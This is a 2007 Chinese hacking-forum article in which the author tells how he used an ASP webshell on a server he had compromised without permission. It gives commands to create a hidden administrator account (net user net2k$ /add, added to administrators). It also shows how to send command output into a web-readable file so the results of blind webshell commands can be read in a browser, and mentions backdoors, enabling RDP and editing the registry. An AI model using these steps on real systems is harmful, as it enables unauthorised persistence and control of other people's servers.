我爱黑客网首页 设为首页
加入收藏
联系我们
 首 页  技术文章 下载中心 站长学院 交流论坛
 软件:
 文章:        教程:
 推荐: 我爱黑客网论坛
 
 
 
 
   
黑软: Q Q 软件 木马间谍 探嗅监听 溢出攻击 加密解密 漏洞扫描 脚本注入 远程控制 综合利用 聊天工具  
 
技术文章: 爱黑新闻 | 黑客攻防 | 安全防御 | 程序设计 | 系统操作 | 网络技术 | 本站动态 | 业界动态 | 安全公告 | 病毒公告
 
 
您当前的位置:我爱黑客网 -> 黑客攻防 -> 工具详解 -> 文章内容  
栏目导航
· Q Q 攻防 · 黑客入门
· 攻防实战 · 安全初步
· 工具详解 · 黑客教程
· 漏洞研究 · 黑客编程
· 技术杂谈
热门文章
· 灰鸽子新手完全教程(..
· 关于一句话木马
· 帮老马的ASP站长助手正..
· google 搜索引擎实用技..
· 软件、程序脱壳的各种..
· 开启网络终端连接最简..
· Hacker defender 中文..
· 黑客必备命令-FTP命令..
· 最新版的pcshare的免疫..
· 用好MSN Spaces之新手..
· 视频:ADSL宽带共享上..
· 便捷的数据收集工具—..
相关文章

· 巧妙设置路由器 保护..
· 巧妙利用系统控制台..
· 安全小技巧之巧妙设..
· 通过巧妙设置确保局..
· 巧妙汉化Windows XP..
· 手把手教您如何巧妙..
· 一种巧妙的删除程序..
· Win 2003中巧妙的释..
· 巧妙隐藏QQ聊天窗口..
· 新型恶性QQ病毒警报..
查看更多与巧妙解决海洋ASP木马cmd命令无回显问题相关内容

巧妙解决海洋ASP木马cmd命令无回显问题
作者:幽火  来源:www.5ihack.com  发布时间:2007-5-6 13:51:10  发布人:ghostfire

减小字体 增大字体



作者: net2k   来源:http://www.52chb.com/


昨天黑的服务器,由于疏忽,还有些文件未进行扫尾清理,今天打算上个后门开3389服务。轻车熟路,打开海洋asp木马,把自己写好用来添加ID和开启服务的程序和准备好的开3389程序上传了上去,给我的结果是"0个文件上传",狂晕...差点没把我给气死...难道管理员有所察觉?但是我昨天上传的垃圾文件他不可能没发现呀?额头落一滴汗珠-----郁闷ing......这下我可是后悔得不得了,恨自己昨天没一口气黑到底,不停的叹气,不管它了,反正还能利用这匹马儿来为我出力-------姑且死马当活马医,碰碰运气吧:(,(因为asp木马不是最高权限......)....在cmd命令框里输入:
------------------------------------------------------------
net user net2k$ 1234 /add //回车
net localgroup administrators net2k$ /add //回车
------------------------------------------------------------
这里遇到一个问题,由于不能回显,根本看不到帐户是否添加成功,
望着“不回显CMD命令”几个字,正长吁短叹之际,突然眼前一亮,想到了echo重定向命令,真是"山穷水尽疑无路,柳暗花明又一村"。关于这个echo命令,我这里在网上抄了一段例子说明下,新手如果不明白的可以去google搜索相关资料,这方面的资料是很多的~!
===============================================================================================


假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖!”写入index.htm,有2种方法,大家看看有什么区别。
-------------------------------------------------------
echo 南京大屠杀铁证如山,任何日本人不得抵赖!>index.htm
echo 南京大屠杀铁证如山,任何日本人不得抵赖!>>index.htm
-------------------------------------------------------
第一个的意思是覆盖index.htm原有的内容,把“南京大屠杀铁证如山,任何日本人不得抵赖!”写进index.htm。
第二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖!”加到index.htm里面。
-------------------------------------------------------
“>>”产生的内容将追加进文件中,“>”则将原文件内容覆盖。
这里说明一下,<和>是重定向命令只是一个是输入重定向另一个是输出重定向,比如我们在命令提示符下就会显示c:\>这个
意思就是把C盘的命令权重定向给我们,同样:也是定向的命令也叫作管道,它是用来连接两个命令的管道,先执行管道左边
的命令,再执行管道右边的命令.
===============================================================================================
呵呵,懂echo原理的朋友就不必看了。其实这个方法的思路就是把命令的回显重定向到网站IIS目录的某个文件里,然后用IE访问它,IE里我门就可以间接看到命令的回显了。打个比方,网站IIS的物理路径是:
------------------------------------------------------------
D:\Inetpub\wwwroot\
------------------------------------------------------------

而在wwwroot\下又有很多站点,我们就把文件写入其中任意一个站点,请看命令:
------------------------------------------------------------
net user>D:\Inetpub\wwwroot\tty\chb.txt
------------------------------------------------------------

这样,我们就把net user的命令回显写进了一个tty的目录。那么我们又要如何察看这个文件呢?这也很简单,因为我黑这个服务器是从一个网站渗头进入的,我echo文件也是写进这个网站的根目录的。所以我直
接在IE地址栏里写上这个网站地址再在地址的后面加chb.txt这个文件名就可以访问了。比如这个网站的地址是:
------------------------------------------------------------
http://www.x.net/
------------------------------------------------------------


我们就写:
------------------------------------------------------------
http://www.x.net/chb.txt
------------------------------------------------------------

当然,如果你echo文件时,不是把重定向写到这个网站的根目录,这样是根本访问不了的。呵呵,接下来的事情就是不停的执行你的命令,在IE这端不停按F5刷新就OK了。题外话,用这个命令我们还可以生成注册表文件,直接修改服务器的注册表等等....反正是可以做很多事情的啦^_^!

查看更多与巧妙解决海洋ASP木马cmd命令无回显问题相关内容

[ ] [返回上一页] [打 印] [收 藏]
上一篇文章:
下一篇文章:
      Windows 2003管理工具命令行模式对照表       常用黑客工具的使用方法集锦
∷相关文章评论∷   (评论内容只代表网友观点,与本站立场无关!) [发表评论]
 
 
 
 
晋ICP备05008232   维护网络安全、传播安全技术才是我们的目标! 
 
关于本站 - 网站帮助 - - 下载声明 - 友情连接 -网站地图